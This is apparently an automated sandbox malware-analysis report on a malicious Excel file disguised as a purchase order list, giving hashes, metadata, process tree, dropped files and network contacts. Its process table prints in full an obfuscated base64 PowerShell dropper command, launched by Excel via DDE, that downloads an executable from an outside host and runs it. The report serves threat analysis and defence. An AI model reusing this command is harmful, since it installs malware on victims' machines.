File name: | Purchase_Order_list#.xls |
Full analysis: | https://app.any.run/tasks/c94cc6e7-f4d4-4dbb-9ead-d88301e2e257 |
Verdict: | Malicious activity |
Analysis date: | November 15, 2018, 07:36:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: PC, Last Saved By: PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Nov 14 22:33:34 2018, Last Saved Time/Date: Wed Nov 14 22:33:36 2018, Security: 0 |
MD5: | 281DAE219385648EEBC7E1DB76834738 |
SHA1: | 5AE120368CF74707210A5C9FBA87BF5AC427D0F8 |
SHA256: | 30D3AE38737FE31503073A8B60659366397A5F0DBCF4F53D8E4A439D3F9E9265 |
SSDEEP: | 1536:qDZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAAQM25tTy3XDyFTnSVuGbUz/fp0f057m:qDZ+RwPONXoRjDhIcp0fDlaGGx+cL26p |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Author: | PC |
---|---|
LastModifiedBy: | PC |
Software: | Microsoft Excel |
CreateDate: | 2018:11:14 22:33:34 |
ModifyDate: | 2018:11:14 22:33:36 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 12 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
CompObjUserTypeLen: | 38 |
CompObjUserType: | Microsoft Office Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3956 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 4294967295 Version: 14.0.6024.1000 | ||||
1404 | cMD & /C PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZQA5ADIAXwAyAE0AbAAxAG4AZwBGADQAUQBFADkAcABGAGgAYgAgACgAIAAkAEIAbQBIAGkARwA2ADcAawBtAFkAdQA0AHUAZgBtAG4AXwBnAGkANQB1AHkAZQAxAHcAaQBKAFMAWAAgACwAIAAkAFIAeAB3AHkAdQA0ADEAeQBSADIANgBPAEEATABNAHYASwBIAHUAYQBUACAAKQB7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAgACQAQgBtAEgAaQBHADYANwBrAG0AWQB1ADQAdQBmAG0AbgBfAGcAaQA1AHUAeQBlADEAdwBpAEoAUwBYACAALAAgACQAUgB4AHcAeQB1ADQAMQB5AFIAMgA2AE8AQQBMAE0AdgBLAEgAdQBhAFQAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAUgB4AHcAeQB1ADQAMQB5AFIAMgA2AE8AQQBMAE0AdgBLAEgAdQBhAFQAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEkASwB4AGYAbAB4AEgASQAxADkAQwA3AE4AeAAxAGUAawBSAE0AQQBSAGwAWAByAEsATQA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAaABiAEgAWABxAEkAWAA0AGQAYwBZAFgAXwA1AFUAUQB1ADcALgBlAHgAZQAnADsADQAKAGUAOQAyAF8AMgBNAGwAMQBuAGcARgA0AFEARQA5AHAARgBoAGIAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AZgBrAGwAZgBlAHcALgBqAHAAZwAnACAAJABJAEsAeABmAGwAeABIAEkAMQA5AEMANwBOAHgAMQBlAGsAUgBNAEEAUgBsAFgAcgBLAE0AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\system32\cMD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2056 | PowErSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAZQA5ADIAXwAyAE0AbAAxAG4AZwBGADQAUQBFADkAcABGAGgAYgAgACgAIAAkAEIAbQBIAGkARwA2ADcAawBtAFkAdQA0AHUAZgBtAG4AXwBnAGkANQB1AHkAZQAxAHcAaQBKAFMAWAAgACwAIAAkAFIAeAB3AHkAdQA0ADEAeQBSADIANgBPAEEATABNAHYASwBIAHUAYQBUACAAKQB7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAgACQAQgBtAEgAaQBHADYANwBrAG0AWQB1ADQAdQBmAG0AbgBfAGcAaQA1AHUAeQBlADEAdwBpAEoAUwBYACAALAAgACQAUgB4AHcAeQB1ADQAMQB5AFIAMgA2AE8AQQBMAE0AdgBLAEgAdQBhAFQAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAUgB4AHcAeQB1ADQAMQB5AFIAMgA2AE8AQQBMAE0AdgBLAEgAdQBhAFQAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgBrAGkAbABsACAALQBwAHIAbwBjAGUAcwBzAG4AYQBtAGUAIABFAFgAQwBFAEwAOwAgAA0ACgAkAEkASwB4AGYAbAB4AEgASQAxADkAQwA3AE4AeAAxAGUAawBSAE0AQQBSAGwAWAByAEsATQA9ACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAKwAnAFwAaABiAEgAWABxAEkAWAA0AGQAYwBZAFgAXwA1AFUAUQB1ADcALgBlAHgAZQAnADsADQAKAGUAOQAyAF8AMgBNAGwAMQBuAGcARgA0AFEARQA5AHAARgBoAGIAIAAnAGgAdAB0AHAAcwA6AC8ALwBhAC4AZABvAGsAbwAuAG0AbwBlAC8AZgBrAGwAZgBlAHcALgBqAHAAZwAnACAAJABJAEsAeABmAGwAeABIAEkAMQA5AEMANwBOAHgAMQBlAGsAUgBNAEEAUgBsAFgAcgBLAE0AOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cMD.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3956 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA479.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O40BJPTKACEO1WG2M8AR.temp | — | |
MD5:— | SHA256:— | |||
3956 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFC098B390FFCC7749.TMP | — | |
MD5:— | SHA256:— | |||
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70 | binary | |
MD5:DA6C793FB0533AF0139A6D76C9956547 | SHA256:BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D | |||
3956 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFBEF3AEABE3344CC1.TMP | document | |
MD5:1525EFA824B3C2C0DBB38B987B588B6C | SHA256:5B871CA4529A2B0AF092761348CAC6CA4065549CB56A537A0EBBEDA0B94790BE | |||
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
2056 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dab2f.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2056 | powershell.exe | 185.83.214.16:443 | a.doko.moe | — | PT | suspicious |
Domain | IP | Reputation |
---|---|---|
a.doko.moe |
| unknown |